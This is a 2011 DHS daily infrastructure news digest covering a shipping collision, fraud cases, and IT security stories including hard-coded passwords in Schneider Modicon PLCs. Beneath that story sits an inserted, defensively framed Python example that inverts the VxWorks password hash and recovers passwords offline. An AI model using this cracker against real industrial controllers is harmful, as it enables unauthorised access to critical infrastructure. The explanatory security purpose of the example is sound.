Thursday, December 15, 2011

Complete DHS Daily Report for December 15, 2011

Daily Report

Top Stories

• The Houston Ship Channel, the busiest U.S. petrochemical port, was shut indefinitely December 13 after two vessels collided in heavy fog, a U.S. Coast Guard spokesman said. – Reuters (See item 16)

16. December 13, Reuters – (Texas) Collision shuts Houston Ship Channel indefinitely. The Houston Ship Channel, the busiest U.S. petrochemical port, was shut indefinitely December 13 after two vessels collided in heavy fog, a U.S. Coast Guard (USCG) spokesman said. There were no fires after a tanker and a cargo vessel collided at about 8 a.m. near the Texas City Dike, which is in the lower end of the channel between Galveston and Texas City. There was no oil or chemicals spilled in the collision on the 53-mile waterway that routes vessels from the Gulf of Mexico to the huge complex of refineries in Houston and Texas City, a USCG spokesman said. He said the tanker was believed to be carrying the chemical acetone, a cleaning solvent. It was not known what the cargo vessel was carrying. The vessels involved were the tanker Charleston and the cargo vessel Harvest Sun, both about 50,000 tons dead weight, and about 600 feet long, the USCG said. The Charleston was northbound, headed to Houston. The Harvest Sun was southbound, headed from Houston to Texas City. Both vessels anchored safely outside the channel, awaiting investigators, the USCG spokesman said. He said Houston Pilots had stopped boarding vessels due to the fog prior to the accident, and it was unclear when the fog would lift or boarding would resume. Source:

• An electronic device used to control machinery in industrial facilities contains major weaknesses that could allow attackers to take it over remotely, the U.S. Industrial Control Systems Cyber Emergency Response Team warned. – The Register (See item 34 below in the Information Technology Sector)


Banking and Finance Sector

9. December 13, Indianapolis Business Journal – (Indiana; Michigan) Investment adviser Hauke agrees to plead guilty in $7M fraud. A former Fishers investment manager agreed December 13 to plead guilty to one count of securities fraud in Indianapolis, a charge that carries a maximum penalty of 25 years in prison. Federal prosecutors charged the manager with masking huge losses in his hedge fund for years as part of a scheme that ultimately resulted in 67 investors losing more than $7 million. Immediately after filing the criminal information in federal court in Indianapolis, the U.S. attorney’s office submitted a plea agreement. The agreement, which requires court approval, would prevent the government from recommending a prison sentence of more than 17 years. Indiana’s securities division began investigating the manager early in 2011 after a co-worker told the state about irregularities he had discovered. The FBI soon joined the probe. In August, the Indianapolis Business Journal reported the man’s hedge fund had invested millions of dollars in Michigan real estate 7 years ago without telling clients, and that the holdings ended up nearly worthless. Rather than disclose the losses, the man created fake account statements for clients and used money from new investors to pay off earlier ones. In court papers, prosecutors alleged he diverted some investor funds for personal use, including paying off the mortgage on his home. Source:

10. December 13, Bloomberg – (National) SEC sues Security Investor Protection Corp. over Stanford claims. The U.S. Securities and Exchange Commission (SEC) December 12 sued the federal Securities Investor Protection Corp. (SIPC), seeking an order forcing it to create a claims process for victims of an alleged investment fraud. The SEC, in papers filed in federal court in Washington, D.C., said it had determined in June that thousands of those alleged victims may be entitled to SIPC coverage and that SIPC’s unwillingness to act compelled the commission to sue. The SEC sued the head of the Stanford Group and three of his businesses in February 2009, claiming they were part of a $7 billion Ponzi scheme centered on the sale of certificates of deposit by Antigua-based Stanford International Bank. The financier was indicted by a U.S. grand jury in Houston 4 months later. Source:

11. December 13, New York Times – (National) Former Washington Mutual executives settle F.D.I.C. lawsuit. Former executives at Washington Mutual reached a $64 million agreement December 12 to settle a civil lawsuit with the government, according to officials with the Federal Deposit Insurance Corporation (FDIC), which pursued the case after the savings and loan collapsed in 2008. The deal is one of the larger amounts recovered in a financial crisis case, though only about $400,000 in total will be paid by the executives, according to a person briefed on the settlement but not authorized to discuss it. The FDIC initially sought $900 million in the case, which it filed in March. Much of the settlement will come from insurance policies the company took out for the executives, who are also releasing Washington Mutual from financial claims they have against it. The settlement money will be distributed among Washington Mutual’s creditors. It will not benefit the FDIC fund because it did not lose money when Washington Mutual foundered and was sold in part to JPMorgan Chase & Company, FDIC officials said. The FDIC accused executives of pushing Seattle-based Washington Mutual to the brink by making risky bets to reap short-term profits for themselves. In an unusual move, the FDIC also accused the wives of two of the executives of helping them shield some compensation from the company from legal claims. Source:

For another story, see item 39 below in the Information Technology Sector

Information Technology

34. December 14, The Register – (International) SCADA vuln imperils critical infrastructure, feds warn. An electronic device used to control machinery in water plants and other industrial facilities contains serious weaknesses that allow attackers to take it over remotely, the U.S. Industrial Control Systems Cyber Emergency Response Team warned. Some models of the Modicon Quantum PLC used in industrial control systems contain multiple hidden accounts that use predetermined passwords to grant remote access, the agency said in an advisory issued December 14. Palatine, Illinois–based Schneider Electric, the maker of the device, produced fixes for some of the weaknesses and continues to develop additional mitigations. The programmable logic controllers reside at the lowest levels of an industrial plant, where computerized sensors meet the valves, turbines, or other machinery being controlled. The default passwords are hard-coded into the Ethernet cards the systems use to funnel commands into the devices and to get temperatures and other data out of them. The Ethernet modules also allow administrators to log into the machinery remotely using protocols such as telnet, FTP, and the Wind River debug port. According to a blog post published December 12 by an independent security researcher, the NOE 100 and NOE 771 modules contain at least 14 hard-coded passwords, some of which are published in support manuals. Even where the passwords are obscured using cryptographic hashes, they are easy to recover because of documented weaknesses in the underlying VxWorks operating system. As a result, attackers can exploit the weakness to log into the devices and gain privileged access to their controls. Source:
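Why a hashed password in a support manual or a configuration dump is no safer than a cleartext one, as an added example (not code from the advisory, from Schneider Electric, or from the researcher’s post): the hash below is reconstructed from the public 2010 analyses of the VxWorks loginDefaultEncrypt() routine, and its multiplier, length limits and digit-substitution table are written from memory, so treat those constants as assumptions. The property the example demonstrates does not depend on them: a hash that is a function of a small per-character sum has an output space of a few thousand values for 8-character passwords, the multiply step is invertible, and a preimage can be recovered offline in seconds. The practical consequence for the modules above is that any leaked hash string should be treated as the password itself, and telnet/FTP access to the Ethernet cards should be blocked at the network boundary rather than relied upon to be protected by obscured credentials.

```python
"""Weak additive password hashing of the kind found in embedded OSes.

Added example, not code from the advisory or from Schneider Electric.
MAGIC, the 8..40 length rule and the substitution table are assumptions
reconstructed from memory of public VxWorks loginDefaultEncrypt() analyses.
"""
import itertools
import string

MAGIC = 31695317        # assumed multiplier from the original routine
MASK32 = 0xFFFFFFFF     # 32-bit unsigned long on the affected targets (assumed)
PRINTABLE = "".join(chr(c) for c in range(32, 127))


def char_term(c: int, k: int) -> int:
    """Contribution of character code c at 1-based position k.
    C precedence makes `c * k ^ k` mean `(c * k) ^ k`, so XOR only
    perturbs the low bits: each term is within +/-15 of c * k."""
    return (c * k) ^ k


def weak_sum(password: str) -> int:
    """Everything the hash knows about the password is this one integer."""
    return sum(char_term(ord(ch), k) for k, ch in enumerate(password, start=1))


def _sub_digit(d: str) -> str:
    """Map a decimal digit to the printable letter the hash string uses (assumed table)."""
    v = ord(d)
    if v < ord("3"):
        v += ord("!")      # '0'..'2' -> 'Q','R','S'
    elif v < ord("7"):
        v += ord("/")      # '3'..'6' -> 'b'..'e'
    else:
        v += ord("B")      # '7'..'9' -> 'y','z','{'
    return chr(v)


_UNSUB = {_sub_digit(d): d for d in "0123456789"}


def weak_hash(password: str) -> str:
    """Sum the per-character terms, multiply by MAGIC mod 2**32, substitute digits."""
    if not 8 <= len(password) <= 40:
        raise ValueError("password length must be 8..40")
    digits = str((weak_sum(password) * MAGIC) & MASK32)
    return "".join(_sub_digit(d) for d in digits)


def hash_to_sum(h: str) -> int:
    """Invert the hash string back to weak_sum(): undo the substitution, then
    multiply by the modular inverse of MAGIC (odd, so invertible mod 2**32).
    For lengths up to 40 the sum is far below 2**32, so no wrap is lost."""
    n = int("".join(_UNSUB[ch] for ch in h))
    return (n * pow(MAGIC, -1, 1 << 32)) & MASK32


def hash_space_bound(length: int, alphabet: str = PRINTABLE) -> int:
    """Upper bound on distinct hashes for passwords of this length: positions
    are independent, so every sum lies between the per-position minima and
    maxima. Compare the result with len(alphabet) ** length."""
    ks = range(1, length + 1)
    lo = sum(min(char_term(ord(c), k) for c in alphabet) for k in ks)
    hi = sum(max(char_term(ord(c), k) for c in alphabet) for k in ks)
    return hi - lo + 1


def find_preimage(target_hash: str, alphabet: str = string.ascii_lowercase,
                  length: int = 8):
    """Meet-in-the-middle: table the sums of all first halves, then scan the
    second halves for one whose sum completes the target. Returns any
    password over `alphabet` that hashes to target_hash, or None."""
    target = hash_to_sum(target_hash)
    half = length // 2
    first = {}
    for combo in itertools.product(alphabet, repeat=half):
        s = sum(char_term(ord(c), k) for k, c in enumerate(combo, start=1))
        first.setdefault(s, combo)
    for combo in itertools.product(alphabet, repeat=length - half):
        s = sum(char_term(ord(c), k) for k, c in enumerate(combo, start=half + 1))
        left = first.get(target - s)
        if left is not None:
            return "".join(left) + "".join(combo)
    return None


if __name__ == "__main__":
    h = weak_hash("password")          # constructed sample, not a real device hash
    print("hash string:", h)
    print("distinct hashes for ALL 8-char printable passwords, at most:",
          hash_space_bound(8))
    print("recovered preimage:", find_preimage(h))
```

The search uses only lowercase letters to keep the tables small; widening the alphabet or the length changes the run time, not the outcome, because the reachable sums stay within a band of a few thousand values whatever the password policy.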

35. December 14, IDG News Service – (International) Hitachi-LG Data Storage execs plead guilty to price fixing. Three executives at Hitachi-LG Data Storage agreed to plead guilty and serve prison time in the United States for their participation in a series of conspiracies to rig bids and fix the prices of optical disk drives sold to large computer makers, the U.S. Department of Justice (DOJ) announced December 13. The three executives conspired with others to suppress competition by rigging bids for optical disk drives sold to Dell and Hewlett-Packard, and to fix prices for optical disk drives sold to Microsoft, the DOJ said. The conspiracies happened at various times between November 2005 and September 2009. Under a plea agreement in federal court in California, two of the executives each agreed to serve 8 months in prison, and the third agreed to serve 7 months in prison. Each also agreed to pay a $25,000 fine. Source:

36. December 14, The Register – (International) York CompSci student pleads guilty to Facebook hack. A computer enthusiast from York in the United Kingdom admitted to hacking into Facebook. The man pleaded guilty to hacking into the social networking site between April and May 2011 at a hearing December 13. The court heard the incident sparked a major security alert amid fears some form of industrial espionage was involved, the BBC reported. The man, a computer science student, previously advised Yahoo! on how to improve the security of its Web site. Although his subsequent actions against Facebook were not maliciously motivated, they were unauthorized and resulted in the extraction of what a prosecutor described as “highly sensitive intellectual property.” The man downloaded and stored code he wanted to work with offline. Although he attempted to delete his tracks, he was tracked down and arrested, after which he freely admitted his actions, which violated the U.K.’s Computer Misuse Act. Evidence of the hack was discovered during a routine security check. In a statement, Facebook explained its decision to file a criminal complaint, adding the “attack did not involve an attempt to compromise or access user data.” A sentencing hearing against the man is set for February 17. Source:

37. December 14, Infosecurity – (International) Use of the Black Hole exploit kit and Java exploits is growing. Security experts are increasingly concerned about the growth of Java as the application of choice for criminals. Java either is or will imminently become the favorite application attack vector, surpassing even PDF and SWF files. A security expert with Kaspersky Lab wrote that a Java exploit first published in October and used in drive-by attacks has found its way into the Black Hole exploit kit, aimed primarily at users in Russia, the United States, the United Kingdom, and Germany. “Java is probably the vector most commonly exploited by cybercriminals,” said a SophosLabs security expert, “and we don’t see any sign of this situation changing anytime soon. The Black Hole exploit pack is the most commonly used malicious software installer that SophosLabs have been seeing in the last three months.” According to Oracle, there are more than 13 million devices running Java. Criminals are turning to Java because they are businessmen — they tend to perform cost-benefit analyses. The problem with Java, said an ESET senior research fellow, comes “from the fragmentation of its implementations across platforms and devices.” He noted he is unsure “how far it’s possible to fix it across the board.” Source:

38. December 13, Computerworld – (International) Microsoft scratches BEAST patch at last minute, but fixes Duqu bug. Microsoft issued 13 security updates December 13, 1 less than expected, that patched 19 vulnerabilities in Windows, Internet Explorer (IE), Office, and Windows Media Player. The company scrapped one bulletin it planned to deliver after SAP said the patch broke some of its software. The scrubbed security update was to fix the Secure Sockets Layer (SSL) 3.0 and Transport Layer Security (TLS) 1.0 bug demonstrated in September by researchers who crafted a hacking tool dubbed BEAST (Browser Exploit Against SSL/TLS). SAP, the German developer that creates enterprise business operations and management software, was the third-party vendor that reported the compatibility problems. Microsoft added it would rather pull a bulletin than “ship something that might inconvenience customers.” Microsoft did patch the vulnerability exploited by the Duqu intelligence-gathering trojan, however; that flaw was the subject of an advisory the company issued in early November after news broke of what some called a possible precursor to the next Stuxnet. Source:

39. December 13, threatpost – (International) Adobe pushes fix for ColdFusion cross site scripting hole. No word on Reader, Acrobat patch. Adobe released a patch December 13 for a vulnerability affecting versions of its ColdFusion Web application development platform. A company spokeswoman said the company still has not set a date for an emergency patch for a critical and previously unknown hole in both the Adobe Reader and Adobe Acrobat applications, after promising to issue a fix the week of December 12. The vulnerability affects ColdFusion versions 9.0.1, 9.0, 8.0.1, and 8.0 running on Windows, Mac OS, and UNIX, and could be used in cross-site scripting attacks against those platforms, an Adobe security bulletin states. However, a developer who helped discover the hole said it did not allow malicious code to be executed in the tests he performed. ColdFusion is a development platform used to create rich Internet applications. Web developers working for the Federal Reserve Bank of Atlanta discovered the cross-site scripting vulnerability as part of an internal development project, according to a senior Web developer at the bank. He and a colleague reported the hole to Adobe in August, then worked with Adobe staff to fix it. He told threatpost that staff at the Federal Reserve Bank never found a way to use the hole to run malicious code on vulnerable systems. Source:

40. December 13, CNET News – (International) Google pulls more SMS fraud-related Android apps. Google removed five additional apps from the Android Market that mobile-security firm Lookout alleges appear to be engaged in SMS fraud targeting Europeans. The apps were removed after Lookout discovered them December 13, a Lookout representative told CNET. That brings the total number of apps removed that Lookout has dubbed “RuFraud” (Russian Fraud) to 27, the representative said. The apps, which appear to be free versions of legitimate games or wallpaper, are designed to charge premium SMS toll rates on European phones, Lookout said. The rates are buried within the terms of service, and users may not realize they will be charged $5 per SMS, according to the firm. Google confirmed December 12 it removed 22 Lookout-identified fraudulent apps before the firm found the 5 additional ones. Source:

41. December 13, H Security – (International) Carrier IQ finds bug that has been saving SMS texts. Carrier IQ admitted in a report that it has been saving some SMS text messages, but that the contents were not readable. Carrier IQ is still responding to inquiries after it tried to silence a security researcher with a cease and desist order. The company later lifted that order, but the researcher’s further disclosures have put the company on the defensive. The latest issue is that the firm found a bug while auditing its software. Carrier IQ said the bug only occurs “in some unique circumstances,” when SMS messages are received during a call: the messages would be embedded in layer 3 radio messages and not decoded. The firm said it has remedied the bug. The disclosure came as Carrier IQ is under further pressure to disclose more about how it operates. The report it issued also gives further details on how Carrier IQ collects and processes data from mobile devices, including some details on its Mobile Service Intelligence Platform. Source:

Communications Sector

42. December 14, WSAZ 3 Huntington/Charleston – (West Virginia) Vandalism causes phone and Internet outage. Vandalism was to blame for a December 14 phone and Internet outage in parts of Cabell and Lincoln Counties, West Virginia. A spokesperson for Frontier Communications said about 1,000 customers were affected. Those customers are in Salt Rock and Hamlin. Service was expected to be restored around noon December 14. The vandalism happened the night of December 13. Source:

For more stories, see items 36, 40, and 41 above in the Information Technology Sector